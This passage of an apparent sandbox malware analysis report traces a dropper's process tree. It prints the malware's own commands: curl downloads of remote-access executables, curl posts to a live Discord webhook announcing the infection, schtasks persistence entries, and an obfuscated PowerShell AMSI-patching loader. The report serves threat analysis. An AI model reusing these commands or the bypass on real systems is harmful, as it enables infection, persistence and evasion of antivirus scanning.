| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\svchost.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\sachost.exe | N/A |
| N/A | N/A | C:\Users\Admin\penisballs.exe | N/A |
| N/A | N/A | C:\Users\Admin\physics.exe | N/A |
| N/A | N/A | C:\Users\Admin\penisballs.exe | N/A |
| N/A | N/A | C:\Users\Admin\sachost.exe | N/A |
| N/A | N/A | C:\Users\Admin\physics.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x238,0x23c,0x240,0x234,0x2f0,0x7fffce9e2e98,0x7fffce9e2ea4,0x7fffce9e2eb0
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=3204 --field-trial-handle=3088,i,14310325015283915034,7660943942870463106,262144 --variations-seed-version /prefetch:3
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe
"C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1239677728240832532/RFIoqPa0RsA3ISZRB7mropzgu-w8H3HuWhnGN1Nqe_5NlnvP2SuBf7hFvNWch7r5TDhv" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
C:\Windows\SysWOW64\curl.exe
curl "https://discord.com/api/webhooks/1239677728240832532/RFIoqPa0RsA3ISZRB7mropzgu-w8H3HuWhnGN1Nqe_5NlnvP2SuBf7hFvNWch7r5TDhv" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://recte.host/xworm/yar.exe --output C:\Users\Admin\yar.exe
C:\Windows\SysWOW64\curl.exe
curl https://recte.host/xworm/yar.exe --output C:\Users\Admin\yar.exe
C:\Users\Admin\yar.exe
"C:\Users\Admin\yar.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://recte.host/venom/scchost.exe --output C:\Users\Admin\sachost.exe
C:\Windows\SysWOW64\curl.exe
curl https://recte.host/venom/scchost.exe --output C:\Users\Admin\sachost.exe
C:\Users\Admin\sachost.exe
"C:\Users\Admin\sachost.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://recte.host/xworm/penisware.exe --output C:\Users\Admin\penisware.exe
C:\Windows\SysWOW64\curl.exe
curl https://recte.host/xworm/penisware.exe --output C:\Users\Admin\penisware.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Users\Admin\penisware.exe
"C:\Users\Admin\penisware.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://recte.host/venom/penisware2.exe --output C:\Users\Admin\penisballs.exe
C:\Windows\SysWOW64\curl.exe
curl https://recte.host/venom/penisware2.exe --output C:\Users\Admin\penisballs.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Users\Admin\penisballs.exe
"C:\Users\Admin\penisballs.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://recte.host/xworm/physics.exe --output C:\Users\Admin\physics.exe
C:\Windows\SysWOW64\curl.exe
curl https://recte.host/xworm/physics.exe --output C:\Users\Admin\physics.exe
C:\Users\Admin\physics.exe
"C:\Users\Admin\physics.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://recte.host/venom/calc.exe --output C:\Users\Admin\calc.exe
C:\Windows\SysWOW64\curl.exe
curl https://recte.host/venom/calc.exe --output C:\Users\Admin\calc.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "yar" /tr "C:\Users\Admin\AppData\Roaming\yar.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "penisware" /tr "C:\Users\Admin\AppData\Local\penisware.exe"
C:\Users\Admin\calc.exe
"C:\Users\Admin\calc.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://recte.host/r77/Install.exe --output C:\Users\Admin\install.exe
C:\Windows\SysWOW64\curl.exe
curl https://recte.host/r77/Install.exe --output C:\Users\Admin\install.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
C:\Users\Admin\install.exe
"C:\Users\Admin\install.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1239677728240832532/RFIoqPa0RsA3ISZRB7mropzgu-w8H3HuWhnGN1Nqe_5NlnvP2SuBf7hFvNWch7r5TDhv" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""@everyone`yar.exe, sachost.exe, penisware.exe, penisballs.exe, physics.exe, calc.exe, and install.exe` Were Just Run On `Admin`'s PC"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
C:\Windows\SysWOW64\curl.exe
curl "https://discord.com/api/webhooks/1239677728240832532/RFIoqPa0RsA3ISZRB7mropzgu-w8H3HuWhnGN1Nqe_5NlnvP2SuBf7hFvNWch7r5TDhv" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""@everyone`yar.exe, sachost.exe, penisware.exe, penisballs.exe, physics.exe, calc.exe, and install.exe` Were Just Run On `Admin`'s PC"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:khqieLPAGIkJ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QaFcTjDysRIKOS,[Parameter(Position=1)][Type]$xFFbXpvOkk)$eDBimKkyPFB=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+'c'+'te'+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+'e'+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+'e'+[Char](109)+''+[Char](111)+''+'r'+'y'+'M'+''+'o'+''+[Char](100)+''+'u'+''+[Char](108)+'e',$False).DefineType('M'+'y'+''+'D'+''+[Char](101)+'l'+'e'+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+''+'T'+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+'s'+','+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+'c'+','+''+'S'+''+[Char](101)+''+[Char](97)+'l'+'e'+'d,'+[Char](65)+''+[Char](110)+'s'+'i'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+[Char](117)+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+'l'+''+'a'+''+'s'+'s',[MulticastDelegate]);$eDBimKkyPFB.DefineConstructor(''+[Char](82)+''+[Char](84)+'Sp'+'e'+''+'c'+'ia'+'l'+''+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+'B'+'y'+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+'P'+'u'+'b'+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$QaFcTjDysRIKOS).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+'a'+'na'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$eDBimKkyPFB.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+'N'+''+'e'+''+'w'+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+'Vi'+[Char](114)+''+[Char](116)+'ual',$xFFbXpvOkk,$QaFcTjDysRIKOS).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+'me'+','+''+'M'+''+'a'+''+[Char](110)+'a'+[Char](103)+'ed');Write-Output $eDBimKkyPFB.CreateType();}$wWpwKdmduEOhy=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+'e'+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+''+[Char](111)+''+[Char](102)+''+'t'+'.'+'W'+''+[Char](105)+''+'n'+''+'3'+'2'+'.'+''+[Char](85)+'n'+'s'+''+[Char](97)+'f'+'e'+'Na'+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+'e'+[Char](116)+'ho'+[Char](100)+''+[Char](115)+'');$CEUggeEQTcKXxV=$wWpwKdmduEOhy.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'c'+'A'+[Char](100)+''+'d'+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$GpCmNAlCOxgkGsQOJwR=khqieLPAGIkJ @([String])([IntPtr]);$nzNlFJJjmdIMbKrTNexeWA=khqieLPAGIkJ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$GBUTUkJFiAC=$wWpwKdmduEOhy.GetMethod('G'+[Char](101)+''+[Char](116)+'M'+[Char](111)+'d'+'u'+''+'l'+''+[Char](101)+''+[Char](72)+''+'a'+''+'n'+''+[Char](100)+''+'l'+'e').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+'n'+[Char](101)+'l'+'3'+'2'+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')));$FrowdEgXLCLTFX=$CEUggeEQTcKXxV.Invoke($Null,@([Object]$GBUTUkJFiAC,[Object]('L'+[Char](111)+''+'a'+''+[Char](100)+''+'L'+''+[Char](105)+''+[Char](98)+''+[Char](114)+'ar'+'y'+''+[Char](65)+'')));$oykFIuICiuCOVfliw=$CEUggeEQTcKXxV.Invoke($Null,@([Object]$GBUTUkJFiAC,[Object]('Vi'+[Char](114)+''+'t'+'ua'+'l'+''+[Char](80)+'ro'+[Char](116)+''+[Char](101)+''+'c'+'t')));$tIBwnIt=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FrowdEgXLCLTFX,$GpCmNAlCOxgkGsQOJwR).Invoke('am'+[Char](115)+'i'+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'');$WGsEYNoUdYPSzUBII=$CEUggeEQTcKXxV.Invoke($Null,@([Object]$tIBwnIt,[Object](''+'A'+''+[Char](109)+'s'+[Char](105)+''+'S'+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+'u'+'f'+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$QoXaWUPNlz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oykFIuICiuCOVfliw,$nzNlFJJjmdIMbKrTNexeWA).Invoke($WGsEYNoUdYPSzUBII,[uint32]8,4,[ref]$QoXaWUPNlz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$WGsEYNoUdYPSzUBII,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oykFIuICiuCOVfliw,$nzNlFJJjmdIMbKrTNexeWA).Invoke($WGsEYNoUdYPSzUBII,[uint32]8,0x20,[ref]$QoXaWUPNlz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+'A'+'R'+''+[Char](69)+'').GetValue('$'+'7'+'7s'+'t'+'a'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svvhost" /tr "C:\Users\Admin\AppData\Roaming\svvhost.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{7dd393c1-6aab-4696-9d80-7741ae4f0c47}
C:\Users\Admin\yar.exe
"C:\Users\Admin\yar.exe"
C:\Users\Admin\sachost.exe
"C:\Users\Admin\sachost.exe"
C:\Users\Admin\penisware.exe
"C:\Users\Admin\penisware.exe"
C:\Users\Admin\penisballs.exe
"C:\Users\Admin\penisballs.exe"
C:\Users\Admin\physics.exe
"C:\Users\Admin\physics.exe"
C:\Users\Admin\calc.exe
"C:\Users\Admin\calc.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "yar" /tr "C:\Windows\system32\config\systemprofile\AppData\Roaming\yar.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "penisware" /tr "C:\Windows\system32\config\systemprofile\AppData\Local\penisware.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svvhost" /tr "C:\Windows\system32\config\systemprofile\AppData\Roaming\svvhost.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1032 --field-trial-handle=3088,i,14310325015283915034,7660943942870463106,262144 --variations-seed-version /prefetch:8
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 456 -p 3296 -ip 3296
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3296 -s 508
C:\Users\Admin\AppData\Roaming\yar.exe
C:\Users\Admin\AppData\Roaming\yar.exe
C:\Users\Admin\AppData\Local\penisware.exe
C:\Users\Admin\AppData\Local\penisware.exe
C:\Users\Admin\AppData\Roaming\svvhost.exe
C:\Users\Admin\AppData\Roaming\svvhost.exe
C:\Users\Admin\AppData\Roaming\yar.exe
C:\Users\Admin\AppData\Roaming\yar.exe
C:\Users\Admin\AppData\Local\penisware.exe
C:\Users\Admin\AppData\Local\penisware.exe
C:\Users\Admin\AppData\Roaming\svvhost.exe
C:\Users\Admin\AppData\Roaming\svvhost.exe
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5212.0.1571581372\1476419891" -parentBuildID 20221007134813 -prefsHandle 1864 -prefMapHandle 1856 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e0e81da7-9ca2-4d71-887d-a5ef14a84881} 5212 "\\.\pipe\gecko-crash-server-pipe.5212" 1944 27d776d7b58 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5212.1.1518298457\657006121" -parentBuildID 20221007134813 -prefsHandle 2312 -prefMapHandle 2308 -prefsLen 20785 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f55e3891-880c-419a-b64f-b2885ad826a3} 5212 "\\.\pipe\gecko-crash-server-pipe.5212" 2344 27d77245c58 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5212.2.2022740486\1688792288" -childID 1 -isForBrowser -prefsHandle 3012 -prefMapHandle 3200 -prefsLen 20888 -prefMapSize 233444 -jsInitHandle 1160 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fb9ad5ef-b656-47b3-b4d9-af5b5ef6c8e6} 5212 "\\.\pipe\gecko-crash-server-pipe.5212" 3232 27d7765c358 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5212.3.216660227\1109609678" -childID 2 -isForBrowser -prefsHandle 3492 -prefMapHandle 3512 -prefsLen 26066 -prefMapSize 233444 -jsInitHandle 1160 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e00775e1-32a4-4d35-9da0-d1754d72708d} 5212 "\\.\pipe\gecko-crash-server-pipe.5212" 3532 27d79cf3058 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5212.4.1359970116\1643841891" -childID 3 -isForBrowser -prefsHandle 3760 -prefMapHandle 3704 -prefsLen 26066 -prefMapSize 233444 -jsInitHandle 1160 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d9859021-b126-49fb-beeb-7ee6f7ce0270} 5212 "\\.\pipe\gecko-crash-server-pipe.5212" 3772 27d79b7d258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
